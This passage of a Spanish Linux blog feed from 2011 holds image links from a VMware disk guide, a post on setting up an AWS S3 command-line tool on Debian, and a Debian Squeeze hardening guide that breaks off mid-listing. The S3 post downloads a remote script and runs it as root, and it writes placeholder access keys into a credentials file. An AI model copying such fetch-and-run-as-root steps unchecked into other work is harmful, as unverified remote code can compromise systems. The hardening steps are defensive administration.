{parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-uqzSHZhlMTI/TubDSHCgsVI/AAAAAAAAAkM/_bgmUIZmWI0/s1600/03.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 131px;" src="http://1.bp.blogspot.com/-uqzSHZhlMTI/TubDSHCgsVI/AAAAAAAAAkM/_bgmUIZmWI0/s320/03.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5685446295496470866" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/-bqoZ2DnxZ9s/TubDSbU1F_I/AAAAAAAAAkY/hpPXD9A1AYM/s1600/04.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 85px;" src="http://3.bp.blogspot.com/-bqoZ2DnxZ9s/TubDSbU1F_I/AAAAAAAAAkY/hpPXD9A1AYM/s320/04.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5685446300942014450" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/-zniEyGGEmwM/TubDSk2McEI/AAAAAAAAAko/mLUh2VRpCio/s1600/05.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 110px;" src="http://3.bp.blogspot.com/-zniEyGGEmwM/TubDSk2McEI/AAAAAAAAAko/mLUh2VRpCio/s320/05.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5685446303497875522" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/-k1xlvo8m3UM/TubEQffsS8I/AAAAAAAAAkw/IBqE3wFzaWo/s1600/06.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 87px;" src="http://2.bp.blogspot.com/-k1xlvo8m3UM/TubEQffsS8I/AAAAAAAAAkw/IBqE3wFzaWo/s320/06.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5685447367213206466" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/-mhV9NxzgVmY/TubEQsrYN9I/AAAAAAAAAk4/XgUUaiEWKac/s1600/07.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 228px;" src="http://3.bp.blogspot.com/-mhV9NxzgVmY/TubEQsrYN9I/AAAAAAAAAk4/XgUUaiEWKac/s320/07.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5685447370751883218" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-aW1xh2jqDVA/TubEQ1mpD-I/AAAAAAAAAlI/z8qz5fAkEIg/s1600/08.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 96px;" src="http://1.bp.blogspot.com/-aW1xh2jqDVA/TubEQ1mpD-I/AAAAAAAAAlI/z8qz5fAkEIg/s320/08.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5685447373147934690" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/-1IOul_AVZv8/TubERD16m6I/AAAAAAAAAlU/a6A2jXI4E-g/s1600/09.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 76px;" src="http://3.bp.blogspot.com/-1IOul_AVZv8/TubERD16m6I/AAAAAAAAAlU/a6A2jXI4E-g/s320/09.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5685447376970095522" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/-SgC8Lue3AO8/TubERsffXII/AAAAAAAAAlg/RPrWR9ZAoSo/s1600/10.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 246px;" src="http://2.bp.blogspot.com/-SgC8Lue3AO8/TubERsffXII/AAAAAAAAAlg/RPrWR9ZAoSo/s320/10.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5685447387881888898" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-b0nn7JKcOY8/TubE6QWrEII/AAAAAAAAAls/mLuEh8ut8ec/s1600/11.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 247px;" src="http://1.bp.blogspot.com/-b0nn7JKcOY8/TubE6QWrEII/AAAAAAAAAls/mLuEh8ut8ec/s320/11.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5685448084703350914" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/-EwOB8ieh6UA/TubE6hEBAWI/AAAAAAAAAl4/onUrRJnH1eQ/s1600/12.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 246px;" src="http://4.bp.blogspot.com/-EwOB8ieh6UA/TubE6hEBAWI/AAAAAAAAAl4/onUrRJnH1eQ/s320/12.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5685448089188499810" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/-VBAqTuIevsU/TubE6zU-L0I/AAAAAAAAAmE/6Cvz0qjifco/s1600/13.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 236px;" src="http://2.bp.blogspot.com/-VBAqTuIevsU/TubE6zU-L0I/AAAAAAAAAmE/6Cvz0qjifco/s320/13.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5685448094091456322" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-46mniDiyiwo/TubE7HZUrII/AAAAAAAAAmM/8Drrhp19s-c/s1600/14.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 241px;" src="http://1.bp.blogspot.com/-46mniDiyiwo/TubE7HZUrII/AAAAAAAAAmM/8Drrhp19s-c/s320/14.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5685448099478416514" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/-nvB4Aylaaac/TubE7dFAw_I/AAAAAAAAAmc/67Peg20rPxc/s1600/15.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 240px;" src="http://2.bp.blogspot.com/-nvB4Aylaaac/TubE7dFAw_I/AAAAAAAAAmc/67Peg20rPxc/s320/15.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5685448105298805746" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/-f60j8ITdV3Y/TubFZ9yEfBI/AAAAAAAAAmo/tkp9mQNYaIM/s1600/16.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 241px;" src="http://4.bp.blogspot.com/-f60j8ITdV3Y/TubFZ9yEfBI/AAAAAAAAAmo/tkp9mQNYaIM/s320/16.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5685448629473803282" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/-6Oofq6-Gqkc/TubFaGXuB0I/AAAAAAAAAm4/FRA7YoCvUgQ/s1600/17.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 87px;" src="http://3.bp.blogspot.com/-6Oofq6-Gqkc/TubFaGXuB0I/AAAAAAAAAm4/FRA7YoCvUgQ/s320/17.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5685448631779198786" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1618663333888458484-3035096665637653797?l=www.redes-seguridad.com.ar' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/r1_iBRNc89WGMH8YVGmjhDy5OEY/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/r1_iBRNc89WGMH8YVGmjhDy5OEY/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/r1_iBRNc89WGMH8YVGmjhDy5OEY/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/r1_iBRNc89WGMH8YVGmjhDy5OEY/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Redes-seguridad/~4/XcKXoZVxJd0" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.redes-seguridad.com.ar/feeds/3035096665637653797/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=1618663333888458484&amp;postID=3035096665637653797" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/3035096665637653797?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/3035096665637653797?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Redes-seguridad/~3/XcKXoZVxJd0/agregar-nuevo-disco-vmware-esxi-5.html" title="Agregar nuevo disco VMware ESXi 5" /><author><name>Hernán Tirado (Morsa)</name><uri>http://www.blogger.com/profile/18067048875052817204</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-Y-1p2KcUEbg/TubDRSEGViI/AAAAAAAAAj0/JatxsuaYDc4/s72-c/01.JPG" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.redes-seguridad.com.ar/2011/12/agregar-nuevo-disco-vmware-esxi-5.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkcMQX49eyp7ImA9WhRQE0o.&quot;"><id>tag:blogger.com,1999:blog-1618663333888458484.post-6587213740233745464</id><published>2011-12-07T10:59:00.000-08:00</published><updated>2011-12-08T13:01:20.063-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-08T13:01:20.063-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Linux" /><title>AWS Management Console Amazon S3 en debian Squeeze</title><content type="html">&lt;strong&gt;Descargamos el AWS:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;root@Debian:~# wget https://raw.github.com/timkay/aws/master/aws&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Damos permisos de ejecucion:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;root@Debian:~# chmod a+x aws&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Ejecutamos:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;root@Debian:~# ./aws&lt;br /&gt;sanity-check: "/root/.awssecret": file is missing.  (Format: AccessKeyID\nSeecretAccessKey\n)&lt;br /&gt;sanity-check: This curl (v) does not support --retry (&gt;= v7.12.3), so --retry is disabled&lt;br /&gt;sanity-check:  Problems accessing AWS.  Is curl installed?&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Nos dice que necesitamos Curl, lo instalamos:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;root@Debian:~# apt-get install curl&lt;br /&gt;&lt;br /&gt;Do you want to continue [Y/n]? &lt;strong&gt;Y&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;sanity-check: "/root/.awssecret": file is missing.  (Format: AccessKeyID\nSeecretAccessKey\n)&lt;br /&gt;sanity-check: Your system clock is 22 seconds behind.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Creamos un archivo donde pondremos el access y la secret:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;root@Debian:~# vim /root/.awssecret&lt;br /&gt;AIOCQODIYUFAYAOISE  &lt;strong&gt;# Reemplazarlo por nuestro access&lt;/strong&gt;&lt;br /&gt;J3XliKAASDBZgOoq0wu21GQqhwHI4t71GwphaqW &lt;strong&gt;# Reemplazarlo por nuestra secret&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Volvemos a ejecutarlo:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;root@Debian:~# ./aws&lt;br /&gt;sanity-check: "/root/.awssecret": file permissions are -rw-r--r--.  Should be -rw-------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Debemos modificar los permisos del awssecret:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;root@Debian:~# ls -l "/root/.awssecret"&lt;br /&gt;-rw-r--r-- 1 root root 62 Dec  6 17:46 /root/.awssecret&lt;br /&gt;&lt;br /&gt;root@Debian:~# chmod 600 /root/.awssecret&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Listamos los Buckets:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;root@Debian:~# ./aws ls&lt;br /&gt;sanity-check: Your system clock is 22 seconds behind.&lt;br /&gt;+-------------------+--------------------------+&lt;br /&gt;|       Name   |       CreationDate       &lt;br /&gt;+-------------------+--------------------------+&lt;br /&gt;| Backet         | 2011-12-06T15:35:34.00&lt;br /&gt;+-------------------+--------------------------+&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Listamos un bucket en particular, vemos que dentro tenemos un file prueba.txt:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;root@Debian:~# ./aws ls Bucket&lt;br /&gt;sanity-check: Your system clock is 7 seconds ahead.&lt;br /&gt;+-------------------+--------+--------+---------+-------------+------------+---------&lt;br /&gt;|       Name        | Prefix | Marker | MaxKeys | IsTruncated |    Key     |       LastModified       | Size | StorageClass |&lt;br /&gt;+-------------------+--------+--------+---------+-------------+------------+---------&lt;br /&gt;| Bucket         |        |        | 1000    | false       |            &lt;br /&gt;|                   |        |        |         |             | prueba.txt | 2011-12-07T17:08:54.000Z | 12   | STANDARD     |&lt;br /&gt;+-------------------+--------+--------+---------+-------------+------------+---------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Subimos un archivo:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;root@Debian:~# ./aws put Bucket otro.txt&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Listamos:&lt;/strong&gt; &lt;br /&gt;&lt;br /&gt;root@Debian:~# ./aws ls Bucket&lt;br /&gt;sanity-check: Your system clock is 8 seconds ahead.&lt;br /&gt;+-------------------+--------+--------+---------+-------------+------------+---------&lt;br /&gt;|       Name        | Prefix | Marker | MaxKeys | IsTruncated |    Key     |       LastModified       | Size | StorageClass |&lt;br /&gt;+-------------------+--------+--------+---------+-------------+------------+---------&lt;br /&gt;| Bucket |        |        | 1000    | false       |            |                          |      |              |&lt;br /&gt;|                   |        |        |         |             | &lt;strong&gt;otro.txt   &lt;/strong&gt;| 2011-12-07T18:27:49.000Z | 5    | STANDARD     |&lt;br /&gt;|                   |        |        |         |             | &lt;strong&gt;prueba.txt &lt;/strong&gt;| 2011-12-07T17:08:54.000Z | 12   | STANDARD     |&lt;br /&gt;+-------------------+--------+--------+---------+-------------+------------+---------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Descargamos un archivo:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;root@Debian:~# ./aws get BackupRatingCorpo/\otro.txt nuevillo.txt&lt;br /&gt;sanity-check: Your system clock is 8 seconds ahead.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1618663333888458484-6587213740233745464?l=www.redes-seguridad.com.ar' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/SttVmhIjW2V7O1nn-Fxg99JrVaQ/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/SttVmhIjW2V7O1nn-Fxg99JrVaQ/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/SttVmhIjW2V7O1nn-Fxg99JrVaQ/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/SttVmhIjW2V7O1nn-Fxg99JrVaQ/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Redes-seguridad/~4/4doIfbQCTvA" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.redes-seguridad.com.ar/feeds/6587213740233745464/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=1618663333888458484&amp;postID=6587213740233745464" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/6587213740233745464?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/6587213740233745464?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Redes-seguridad/~3/4doIfbQCTvA/aws-management-consoleamazon-s3-en.html" title="AWS Management Console Amazon S3 en debian Squeeze" /><author><name>Hernán Tirado (Morsa)</name><uri>http://www.blogger.com/profile/18067048875052817204</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>0</thr:total><feedburner:origLink>http://www.redes-seguridad.com.ar/2011/12/aws-management-consoleamazon-s3-en.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEYERXc4eip7ImA9WhRRGEo.&quot;"><id>tag:blogger.com,1999:blog-1618663333888458484.post-2682142462288823013</id><published>2011-12-02T15:18:00.001-08:00</published><updated>2011-12-02T16:28:24.932-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-02T16:28:24.932-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Linux" /><category scheme="http://www.blogger.com/atom/ns#" term="Seguridad" /><title>Hardening Debian Squeeze</title><content type="html">&lt;span style="font-weight:bold;"&gt;Luego de una instalacion por defecto verificamos que servicios tenemos escuchando:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;root@pdc:~# netstat -ano |grep LISTEN&lt;br /&gt;tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      off (0.00/0/0)&lt;br /&gt;tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      off (0.00/0/0)&lt;br /&gt;tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      off (0.00/0/0)&lt;br /&gt;tcp        0      0 0.0.0.0:49216           0.0.0.0:*               LISTEN      off (0.00/0/0)&lt;br /&gt;tcp6       0      0 :::22                   :::*                    LISTEN      off (0.00/0/0)&lt;br /&gt;tcp6       0      0 ::1:25                  :::*                    LISTEN      off (0.00/0/0)&lt;br /&gt;unix  2      [ ACC ]     STREAM     LISTENING     3564     /var/run/acpid.socket&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Instalamos rcconf para bajar servicios que no utilizamos:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;root@pdc:~# apt-get install rcconf&lt;br /&gt;&lt;br /&gt;root@pdc:~# rcconf&lt;br /&gt; Destildar todo menos ssh&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/-h14ArDWMWJ8/TtlkXS0GrZI/AAAAAAAAAeg/liO9R_-J1o4/s1600/rcconf.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 186px;" src="http://3.bp.blogspot.com/-h14ArDWMWJ8/TtlkXS0GrZI/AAAAAAAAAeg/liO9R_-J1o4/s320/rcconf.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5681682756254739858" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;root@pdc:~# reboot&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Volvemos a verificar los servicios que escuchan luego de deshabilitar los que no son necesarios:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;root@pdc:~# netstat -ano |grep LISTEN&lt;br /&gt;tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      off (0.00/0/0)&lt;br /&gt;tcp6       0      0 :::22                   :::*                    LISTEN      off (0.00/0/0)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Todavia SSH nos queda escuchando en todas las ips y en ipv6, lo cambiamos:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;root@pdc:~# cp -pf /etc/ssh/sshd_config /etc/ssh/sshd_config.orig&lt;br /&gt;&lt;br /&gt;root@pdc:~# vim /etc/ssh/sshd_config&lt;br /&gt; Port 2222&lt;br /&gt; ListenAddress 192.168.1.101&lt;br /&gt; Protocol 2&lt;br /&gt; PermitRootLogin no&lt;br /&gt; PermitEmptyPasswords no&lt;br /&gt;&lt;br /&gt;root@pdc:~# /etc/init.d/ssh restart&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Volvemos a verificar que ahora no esta escuchando SSH en ipv6, fue cambiado el puerto y ademas restringida a una determinada ip:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;root@pdc:~# netstat -ano |grep LISTEN&lt;br /&gt;tcp        0      0 192.168.1.100:2222         0.0.0.0:*               LISTEN      off (0.00/0/0)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Ips desde donde permitimos acceso ssh:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;root@pdc:~# vim /etc/hosts.allow&lt;br /&gt;sshd : 192.168.1.0/255.255.255.0 : allow&lt;br /&gt;&lt;br /&gt;root@pdc:~# vim /etc/hosts.deny&lt;br /&gt;sshd : ALL : deny&lt;br /&gt;&lt;br /&gt;root@pdc:~# netstat -ano |grep LISTEN&lt;br /&gt;tcp        0      0 192.168.1.100:2222        0.0.0.0:*               LISTEN      off (0.00/0/0)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Eliminamos paquetes innecesarios como ser exim, dhcpclient:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;root@pdc:~# apt-get remove --purge exim4-config exim4-base dhcp-client isc-dhcp-client isc-dhcp-common aptitude &lt;br /&gt;eject setserial fdutils discover info nano telet makedev perl gcc libdiscover lighttpd sendmail&lt;br /&gt; &lt;br /&gt;root@pdc:~# apt-get autoremove&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Deshabilitar el reinicio con ctrl+alt+del:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Comentamos la linea en el inittab&lt;br /&gt;&lt;br /&gt;root@pdc:~# vim /etc/inittab&lt;br /&gt;#ca:12345:ctrlaltdel:/sbin/shutdown -t1 -a -r now&lt;br /&gt;&lt;br /&gt;root@pdc:~# telinit q&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Eliminamos la linea de la disquetera del fstab:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;root@pdc:~# vim /etc/fstab&lt;br /&gt;/dev/fd0        /media/floppy0  auto    rw,user,noauto  0       0&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Y si no usamos la lectora de cd:&lt;br /&gt;&lt;br /&gt;/dev/scd0       /media/cdrom0   udf,iso9660 user,noauto     0       0&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Deshabilitamos las shells para los usuarios que no lo necesitan:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;root@pdc:~# vipw&lt;br /&gt;&lt;br /&gt;root:x:0:0:root:/root:/bin/bash&lt;br /&gt;daemon:x:1:1:daemon:/usr/sbin:/bin/false&lt;br /&gt;bin:x:2:2:bin:/bin:/bin/false&lt;br /&gt;sys:x:3:3:sys:/dev:/bin/false&lt;br /&gt;games:x:5:60:games:/usr/games:/bin/false&lt;br /&gt;man:x:6:12:man:/var/cache/man:/bin/false&lt;br /&gt;lp:x:7:7:lp:/var/spool/lpd:/bin/false&lt;br /&gt;mail:x:8:8:mail:/var/mail:/bin/false&lt;br /&gt;news:x:9:9:news:/var/spool/news:/bin/false&lt;br /&gt;uucp:x:10:10:uucp:/var/spool/uucp:/bin/false&lt;br /&gt;proxy:x:13:13:proxy:/bin:/bin/false&lt;br /&gt;www-data:x:33:33:www-data:/var/www:/bin/false&lt;br /&gt;backup:x:34:34:backup:/var/backups:/bin/false&lt;br /&gt;list:x:38:38:Mailing List Manager:/var/list:/bin/false&lt;br /&gt;irc:x:39:39:ircd:/var/run/ircd:/bin/false&lt;br /&gt;gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/false&lt;br /&gt;nobody:x:65534:65534:nobody:/nonexistent:/bin/false&lt;br /&gt;libuuid:x:100:101::/var/lib/libuuid:/bin/false&lt;br /&gt;sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Eliminar bits suid y guid:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;root@pdc:~# find / -path /proc -prune -o -type f -perm +6000 -ls&lt;br /&gt;1646604   72 -rwsr-xr-x   1 root     root        68316 Jan 25 16:19 /bin/mount&lt;br /&gt;1646635   32 -rwsr-xr-x   1 root     root        31360 Oct 14  2010 /bin/ping&lt;br /&gt;1646602   48 -rwsr-xr-x   1 root     root        47304 Jan 25 16:19 /bin/umount&lt;br /&gt;1646686   32 -rwsr-xr-x   1 root     root        29152 Feb 15 17:50 /bin/su&lt;br /&gt;1646636   36 -rwsr-xr-x   1 root     root        35252 Oct 14  2010 /bin/ping6&lt;br /&gt;1741025   12 -rwxr-sr-x   1 root     mail        10164 Feb 13  2010 /usr/bin/dotlockfile&lt;br /&gt;1738793   36 -rwsr-xr-x   1 root     root        34740 Feb 15 17:50 /usr/bin/passwd&lt;br /&gt;1739777   32 -rwxr-sr-x   1 root     crontab     30248 Dec 18 20:46 /usr/bin/crontab&lt;br /&gt;1738792   56 -rwsr-xr-x   1 root     root        50388 Feb 15 17:50 /usr/bin/gpasswd&lt;br /&gt;1737577   28 -rwsr-xr-x   1 root     root        25184 Feb 15 17:50 /usr/bin/newgrp&lt;br /&gt;1739927   40 -rwsr-sr-x   1 daemon   daemon      40704 Nov 30  2009 /usr/bin/at&lt;br /&gt;1738796   36 -rwsr-xr-x   1 root     root        36372 Feb 15 17:50 /usr/bin/chfn&lt;br /&gt;1741800   80 -rwsr-sr-x   1 root     mail        75896 Apr 26  2010 /usr/bin/procmail&lt;br /&gt;1738797   28 -rwsr-xr-x   1 root     root        27956 Feb 15 17:50 /usr/bin/chsh&lt;br /&gt;1739731    8 -rwxr-sr-x   1 root     tty          7784 Jun 17  2010 /usr/bin/bsd-write&lt;br /&gt;1741801   16 -rwxr-sr-x   1 root     mail        13172 Apr 26  2010 /usr/bin/lockfile&lt;br /&gt;1741277   32 -rwxr-sr-x   1 root     mlocate     30492 Nov  4  2009 /usr/bin/mlocate&lt;br /&gt;1737470   12 -rwxr-sr-x   1 root     tty          9944 Jan 25 16:19 /usr/bin/wall&lt;br /&gt;1741309    8 -rwxr-sr-x   1 root     mail         7768 Jan 14 12:08 /usr/bin/mutt_dotlock&lt;br /&gt;1738795   56 -rwxr-sr-x   1 root     shadow      49556 Feb 15 17:50 /usr/bin/chage&lt;br /&gt;1738794   16 -rwxr-sr-x   1 root     shadow      14840 Feb 15 17:50 /usr/bin/expiry&lt;br /&gt;1741396  100 -rwxr-sr-x   1 root     ssh         95564 Dec 26 15:12 